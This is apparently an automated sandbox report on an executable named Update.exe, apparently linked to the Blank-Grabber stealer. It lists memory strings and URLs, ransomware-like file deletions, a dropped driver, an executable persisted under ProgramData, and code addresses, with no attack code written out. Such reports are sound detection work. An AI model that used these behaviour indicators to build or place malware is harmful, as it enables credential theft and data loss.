                    Source: Update.exe, 00000001.00000002.1984550546.000002D8F6680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                    Source: Update.exe, 00000001.00000002.1981954787.000002D8F5E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                    Source: Update.exe, 00000001.00000002.1984651792.000002D8F6780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                    Source: Update.exe, 00000001.00000002.1984651792.000002D8F6780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920n
                    Source: Update.exe, 00000001.00000002.1983074177.000002D8F6246000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1683237991.000002D8F6313000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1981954787.000002D8F5D80000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1981954787.000002D8F5DDC000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1983282257.000002D8F6280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                    Source: Update.exe, 00000001.00000002.1983074177.000002D8F6246000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1683237991.000002D8F6313000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1983282257.000002D8F6280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                    Source: Update.exe, 00000001.00000002.1981954787.000002D8F5E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                    Source: Update.exe, 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                    Source: Update.exe, 00000001.00000002.1983074177.000002D8F6080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                    Source: Update.exe, 00000001.00000002.1981954787.000002D8F5DDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                    Source: Update.exe, 00000001.00000002.1983074177.000002D8F6080000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1983282257.000002D8F6280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                    Source: Update.exe, 00000001.00000002.1985801871.000002D8F72E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: Update.exe, 00000001.00000003.1738640436.000002D8F6666000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1744900520.000002D8F666C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.mic
                    Source: Update.exe, 00000001.00000002.1985801871.000002D8F72E8000.00000004.00001000.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1984842868.000002D8F6A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                    Source: powershell.exe, 00000007.00000002.1894036160.0000021910255000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: Update.exe, 00000001.00000002.1987855894.00007FFDFB65F000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
                    Source: Update.exe, 00000001.00000003.1677786789.000002D8F6114000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
                    Source: Update.exe, 00000000.00000003.1665024233.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: Update.exe, 00000001.00000003.1717583140.000002D8F64AE000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1716289279.000002D8F64AE000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1712251657.000002D8F63F6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1711511210.000002D8F64AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                    Source: Update.exe, 00000001.00000003.1716289279.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1711898974.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1717583140.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1707573436.000002D8F6428000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1700749260.000002D8F6428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: Update.exe, 00000001.00000003.1707573436.000002D8F6428000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1700749260.000002D8F6428000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1981954787.000002D8F5E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                    Source: Update.exe, 00000001.00000003.1716289279.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1711898974.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1717583140.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                    Source: Update.exe, 00000001.00000003.1919637730.000002D8F63F8000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1920419269.000002D8F6364000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1920215342.000002D8F649A000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1979586095.000002D8F649E000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1917979471.000002D8F6460000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1984051494.000002D8F649C000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1983711343.000002D8F63F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: Update.exe, 00000001.00000003.1917759960.000002D8F64B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: Update.exe, 00000001.00000003.1919637730.000002D8F63F8000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1920419269.000002D8F6364000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1920215342.000002D8F649A000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1979586095.000002D8F649E000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1917979471.000002D8F6460000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1984051494.000002D8F649C000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1983711343.000002D8F63F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: Update.exe, 00000001.00000003.1917759960.000002D8F64B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: Update.exe, 00000001.00000002.1980381413.000002D8F3BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                    Source: Update.exe, 00000001.00000002.1981954787.000002D8F5D80000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1981954787.000002D8F5DDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                    Source: Update.exe, 00000001.00000003.1683237991.000002D8F6313000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1984651792.000002D8F6780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                    Source: Update.exe, 00000001.00000002.1984746664.000002D8F68A0000.00000004.00001000.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1984550546.000002D8F6680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                    Source: Update.exe, 00000001.00000002.1984550546.000002D8F6680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsD
                    Source: Update.exe, 00000001.00000002.1984746664.000002D8F68A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningssm0
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F69F0000.00000004.00001000.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1984842868.000002D8F6A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F6A24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F69F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F69F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F69F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F69F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F69F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F69F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
                    Source: Update.exe, 00000000.00000003.1664098813.0000019DCB06D000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000000.00000003.1664098813.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F6A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F6A0C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F6A24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
                    Source: Update.exe, 00000001.00000003.1717583140.000002D8F64AE000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1716289279.000002D8F64AE000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1712251657.000002D8F63F6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1711511210.000002D8F64AE000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1984651792.000002D8F6780000.00000004.00001000.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1984842868.000002D8F6A98000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                    Source: Update.exe, 00000001.00000003.1707573436.000002D8F64CA000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1708876092.000002D8F637F000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1707573436.000002D8F6428000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1712251657.000002D8F6380000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1700749260.000002D8F6428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                    Source: Update.exe, 00000001.00000003.1716289279.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1711898974.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1717583140.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: Update.exe, 00000001.00000003.1707573436.000002D8F6428000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1700749260.000002D8F6428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                    Source: Update.exe, 00000001.00000003.1716289279.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1711898974.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1717583140.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: Update.exe, 00000001.00000003.1707573436.000002D8F6428000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1700749260.000002D8F6428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                    Source: Update.exe, 00000001.00000003.1716289279.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1711898974.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1717583140.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: Update.exe, 00000001.00000003.1919515036.000002D8F63DA000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1920162550.000002D8F63DA000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1983681038.000002D8F63DA000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1978451083.000002D8F63DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_c
                    Source: Update.exe, 00000001.00000003.1716289279.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1711898974.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1717583140.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1707573436.000002D8F6428000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1700749260.000002D8F6428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: Update.exe, 00000001.00000003.1697374122.000002D8F6472000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1707573436.000002D8F6472000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1703822090.000002D8F6472000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
                    Source: Update.exe, 00000001.00000003.1716289279.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1711898974.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1717583140.000002D8F64C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: Update.exe, 00000001.00000002.1985801871.000002D8F72D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F6A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
                    Source: Update.exe, 00000000.00000003.1664178146.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmp, Update.exe, 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.openssl.org/H
                    Source: Update.exe, 00000000.00000003.1662902865.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1677830684.000002D8F5E51000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1674023060.000002D8F5E51000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1677380903.000002D8F5E51000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1677065242.000002D8F5E51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
                    Source: Update.exe, 00000001.00000002.1980953911.000002D8F5940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                    Source: Update.exe, 00000001.00000003.1683237991.000002D8F6313000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1983282257.000002D8F6280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F6A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                    Source: Update.exe, 00000001.00000002.1983074177.000002D8F6246000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1683237991.000002D8F6313000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1983282257.000002D8F6280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Modifies existing user documents (likely ransomware behavior)
                    Source: C:\Users\user\Desktop\Update.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?? \Common Files\Desktop\KZWFNRXYKI.mp3Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?? \Common Files\Desktop\UMMBDNEQBN.jpgJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?? \Common Files\Desktop\ONBQCLYSPU.docxJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?? \Common Files\Desktop\HTAGVDFUIE.xlsxJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?? \Common Files\Desktop\NWTVCDUMOB.pdfJump to behavior
                    Source: cmd.exeProcess created: 51

                    System Summary

                    barindex
                    Very long command line found
                    Source: C:\Users\user\Desktop\Update.exeProcess created: Commandline size = 3647
                    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                    Source: C:\Users\user\Desktop\Update.exeProcess created: Commandline size = 3647Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                    Writes or reads registry keys via WMI
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE1394 NtQueryWnfStateNameInformation,17_2_00007FF633FE1394
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB1394 NtAccessCheckByTypeResultList,97_2_00007FF771DB1394
                    Source: C:\Windows\System32\conhost.exeCode function: 113_2_0000000140001394 NtClose,113_2_0000000140001394
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeFile created: C:\Windows\TEMP\jxokwqntprmq.sys
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_eifcxopy.csd.ps1
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F710000_2_00007FF623F71000
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F969640_2_00007FF623F96964
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F789E00_2_00007FF623F789E0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F81D540_2_00007FF623F81D54
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F8E5700_2_00007FF623F8E570
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F835A00_2_00007FF623F835A0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F95E7C0_2_00007FF623F95E7C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F89EA00_2_00007FF623F89EA0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F8DEF00_2_00007FF623F8DEF0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F997280_2_00007FF623F99728
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F817400_2_00007FF623F81740
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F81F600_2_00007FF623F81F60
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F887940_2_00007FF623F88794
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F798000_2_00007FF623F79800
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F918740_2_00007FF623F91874
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F940AC0_2_00007FF623F940AC
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F908C80_2_00007FF623F908C8
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F880E40_2_00007FF623F880E4
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F819440_2_00007FF623F81944
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F821640_2_00007FF623F82164
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F839A40_2_00007FF623F839A4
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F8DA5C0_2_00007FF623F8DA5C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F7A2DB0_2_00007FF623F7A2DB
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F81B500_2_00007FF623F81B50
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F95C000_2_00007FF623F95C00
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F93C100_2_00007FF623F93C10
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F82C100_2_00007FF623F82C10
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F908C80_2_00007FF623F908C8
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F964180_2_00007FF623F96418
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F7A47B0_2_00007FF623F7A47B
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F7ACAD0_2_00007FF623F7ACAD
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F85D300_2_00007FF623F85D30
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F710001_2_00007FF623F71000
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F969641_2_00007FF623F96964
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F7A2DB1_2_00007FF623F7A2DB
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F81D541_2_00007FF623F81D54
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F8E5701_2_00007FF623F8E570
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F835A01_2_00007FF623F835A0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F95E7C1_2_00007FF623F95E7C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F89EA01_2_00007FF623F89EA0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F8DEF01_2_00007FF623F8DEF0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F997281_2_00007FF623F99728
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F817401_2_00007FF623F81740
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F81F601_2_00007FF623F81F60
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F887941_2_00007FF623F88794
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F798001_2_00007FF623F79800
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F918741_2_00007FF623F91874
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F940AC1_2_00007FF623F940AC
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F908C81_2_00007FF623F908C8
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F880E41_2_00007FF623F880E4
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F819441_2_00007FF623F81944
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F821641_2_00007FF623F82164
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F839A41_2_00007FF623F839A4
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F789E01_2_00007FF623F789E0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F8DA5C1_2_00007FF623F8DA5C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F81B501_2_00007FF623F81B50
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F95C001_2_00007FF623F95C00
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F93C101_2_00007FF623F93C10
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F82C101_2_00007FF623F82C10
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F908C81_2_00007FF623F908C8
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F964181_2_00007FF623F96418
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F7A47B1_2_00007FF623F7A47B
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F7ACAD1_2_00007FF623F7ACAD
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F85D301_2_00007FF623F85D30
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA1118601_2_00007FFDFA111860
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEEB3601_2_00007FFDFAEEB360
